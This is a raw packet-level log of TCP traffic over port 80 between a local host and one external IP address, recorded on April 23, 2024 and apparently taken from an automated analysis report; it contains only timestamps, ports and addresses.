Apr 23, 2024 09:27:08.265830040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.265851974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.265866995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.265875101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.265883923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.265898943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.265914917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.265928984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.265944958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.265959024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.265974998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.265990019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266005039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266020060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266035080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266048908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266063929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266079903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266096115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266105890 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.266109943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266125917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266140938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266148090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.266156912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266174078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266187906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266202927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266218901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266235113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266249895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266266108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266335011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.266335011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.266335964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.266335964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.266894102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266942024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.266942978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.266987085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.267018080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267049074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267081022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.267127037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.267152071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267235994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.267260075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267276049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267291069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267307043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267322063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267337084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267345905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.267354012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267385006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267433882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.267451048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267467022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267482042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267497063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267512083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267518997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.267529011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267544031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.267565012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.267585993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.315557957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.315577984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.315855026 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.317039967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317056894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317073107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317090034 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317106962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317141056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317209005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317224979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317241907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317260027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.317260027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.317260027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.317303896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317321062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317337036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317348003 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.317368984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317411900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.317441940 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317459106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317473888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317486048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.317491055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317507029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317529917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.317564011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317570925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.317584038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.317609072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.317636967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.319361925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.319379091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.319415092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.319432974 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.319905996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.319938898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.319958925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.319976091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320066929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320082903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320123911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320137024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320137024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320141077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320157051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320169926 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320178986 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320189953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320207119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320207119 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320225954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320234060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320242882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320246935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320260048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320271969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320283890 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320302010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320364952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320380926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320396900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320408106 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320413113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320420027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320439100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320452929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320457935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320502043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320557117 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320574045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320590019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320612907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320612907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320625067 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320631981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320648909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320664883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320674896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320681095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.320693970 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320705891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.320719004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.366451979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366470098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366487026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366503954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366566896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366584063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366599083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366615057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366631031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366645098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366661072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366672039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.366677999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.366727114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.366727114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421077013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421143055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421186924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421227932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421228886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421266079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421277046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421288013 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421308041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421324015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421348095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421361923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421385050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421396971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421423912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421430111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421468019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421478987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421505928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421519995 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421542883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421554089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421580076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421591043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421617031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421629906 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421654940 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421667099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421691895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421700954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421729088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421740055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421766043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421777010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421802998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421814919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421838999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421850920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421875954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421894073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421917915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421931982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421955109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.421967030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.421991110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.422002077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.422028065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.422039032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.422065973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.422076941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.422102928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.422113895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.422143936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.422152042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.422193050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.429912090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.429974079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.430016041 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.430016041 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.471895933 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.471942902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.471981049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472089052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472142935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472178936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472181082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472218037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472218990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472258091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472294092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472328901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472363949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472398043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472434044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472470045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472479105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472480059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472480059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472480059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472480059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472480059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472480059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472506046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472521067 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472542048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472578049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472635984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472688913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472723961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472724915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472724915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472724915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472724915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472762108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472783089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472783089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472805977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472817898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472852945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472875118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472888947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472909927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472923994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472934961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472960949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.472970963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.472997904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473007917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473033905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473047972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473069906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473079920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473105907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473120928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473143101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473155975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473179102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473191977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473217964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473222971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473254919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473268032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473292112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473304987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473329067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473340034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473365068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473376036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473402023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473413944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473438025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473449945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473474979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473489046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473511934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473521948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473547935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473560095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473584890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473596096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473620892 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473634005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473656893 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473669052 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473692894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473702908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473730087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473741055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473767996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473778963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473804951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473815918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473841906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.473853111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.473896027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.521640062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.521667957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.521846056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.522882938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.522975922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.522990942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523013115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523036003 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523050070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523057938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:08.523087025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:08.523093939 CEST	49730	80	192.168.2.4	185.172.128.111
